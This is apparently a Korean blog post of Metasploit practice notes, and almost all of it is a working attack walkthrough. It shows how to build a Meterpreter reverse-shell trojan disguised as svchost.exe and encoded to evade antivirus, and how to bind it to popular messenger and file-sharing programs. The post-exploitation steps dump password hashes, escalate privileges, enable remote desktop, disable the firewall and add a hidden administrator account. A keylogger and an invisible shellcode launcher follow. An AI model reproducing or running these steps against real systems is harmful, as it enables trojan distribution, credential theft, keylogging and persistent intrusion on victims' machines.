AND

'보안' 카테고리의 다른 글

meta 실습 정리중  (0) 2011.08.01
연도별 흐름  (0) 2011.07.28
서비스별 포트번호  (0) 2011.05.02
HTTP/1.1 상태 코드 정의  (0) 2011.04.28
AND

meta 실습 정리중

보안 2011. 8. 1. 14:49

- 실습환경- 공격자 : 192.168.102.137 (BT 시스템) , 공격자용 xp ( package merging system ) 희생자 : 192.168.102.135 (xp 시스템) 1) bt>cd /pentest/exploits/framework3 bt>svn update bt>./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.102.136 R | ./msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/svchost.exe or bt>./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.102.136 LPORT=4444 x > /var/www/reverse_tcp.exe 2) 생성된 파일을 공격용 XP에 이동시켜 네이트온 / 파일구리 등 일반적인 응용프로그램과 결합 iexpress 이용 AV 우회를 위해 필요시 themida같은 도구를 이용 3) bt>./msfconsole msf>use exploit/multi/handler msf>exploit(handler) >set PAYLOAD windows/meterpreter/reverse_tcp msf>exploit(handler) >set LHOST 192.168.102.136 msf>exploit(handler) > exploit 4) 패킹/크립팅된 트로이목마 실행 5) meterpreter > ipconfig meterpreter > hashdump meterpreter > ps meterpreter > migrate 680 meterpreter > getsystem meterpreter > sysinfo meterpreter > shell 6) reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f 7) netsh firewall set opmode disable netsh firewall set portopening tcp 3389 redesktop net user hacker hacker /add net localgroup administrators hacker /add 8)meterpreter > screenshot 9) meterpreter > ps iexplorer.exe --> pid 확인 (ex 416 ) meterpreter > migrate 416 meterpreter > keyscan_start meterpreter > keyscan_dump --> ie 상에서의 입력이 키로킹됨. meterpreter > keyscan_stop 10)rdesktop -u hacker -p hacker 192.168.102.135:3389
msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 
LHOST=192.168.1.83 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

	생성되는 코드 라인 복사


에디터 open 후

Attrib +h shellcodeexec.x32.exe
shellcodeexec.x32  생성된 코드 라인 붙여 넣기

저장명 attack.bat

저장 후 bat to exe converter 를 이용하여 attack.bat 를 attack.exe 로 변경

option 에서 invisiable application 으로 변경 후 add 를 선택하여 windows/meterpreter 에서

shellcodeexec.x32.exe 찾아서 지정 후 compile


#cd /pentest/exploits/framework3 && ./msfconsole

msf> use multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set lhost 192.168.1.83
msf > set exitfunc thead
msf > set exitonsession false
msf > exploit -j   / 않되면 j 하지말것

희생자가 생성된 shell.exe 를 실행하게 되면 game over.

meterprerter>sysinfo

'보안' 카테고리의 다른 글

ddos 정리한거. 대충한거라 나중을 위해 올려놓는다.  (0) 2011.08.01
연도별 흐름  (0) 2011.07.28
서비스별 포트번호  (0) 2011.05.02
HTTP/1.1 상태 코드 정의  (0) 2011.04.28
AND